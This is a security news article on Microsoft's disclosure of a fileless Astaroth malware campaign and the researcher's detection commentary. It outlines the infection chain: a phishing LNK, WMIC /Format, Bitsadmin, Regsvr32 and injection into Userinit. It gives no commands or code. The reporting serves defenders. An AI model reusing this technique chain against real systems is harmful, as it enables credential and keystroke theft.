Microsoft Defender ATP Research Team has disclosed details about an ongoing malware campaign that are distributing the Astaroth malware using fileless and living-off-the-land techniques that make it harder for security researchers and antivirus solutions to detect ongoing attacks.

The Astaroth malware trojan, which has been active since at least 2017, is able to steal users' sensitive information like their credentials, keystrokes, and other data, without dropping any executable file on the disk or installing any software on the victim's machine. All the information is then sent to a remote attacker who can use the data to move laterally across networks, carry out financial theft, or sell victim information in the cybercriminal underground.

While analysing the Windows telemetry data Andrea Lelli, a member of the Windows Defender ATP team spotted a sudden spike in usage of the Windows Management Instrumentation Command-line (WMIC) – a legitimate tool that ships with all modern versions of Windows. Upon further investigation it became clear that the source of suspicious activity was the campaign that aimed to run the Astaroth backdoor directly in memory.

The discovered malware campaign utilizes several lifeless techniques and a multi-stage infection process that starts with a spear-phishing email containing a malicious link that leaded the potential victims to an LNK file.

After being double-clicked, the LNK file causes the execution of the WMIC tool with the “/Format” parameter, which allows the download and execution of a JavaScript code. The JavaScript code in turn downloads payloads by abusing the legitimate Bitsadmin tool.

“Two of them result in plain DLL files (the others remain encrypted). The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process,” explained the researcher in a blogpost.

What this means is that the malware doesn’t rely on any traditional methods (vulnerability exploits or trojan downloaders) instead using only legitimate system tools and commands to achieve its goal and to masquerade its activity – a technique that security experts call "living off the land". This technique allows the malware to hide from most end-point antivirus security solutions, which are based on static files analysis.

For traditional, file-centric antivirus solutions the only window of opportunity to detect this attack may be when the two DLLs are decoded after being downloaded, said Lelli. The researcher pointed out that:

“Being invisible may help you for some things, but you should not be under the illusion that you are invincible. The same applies to fileless malware: abusing fileless techniques does not put malware beyond the reach or visibility of security software. On the contrary, some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would.”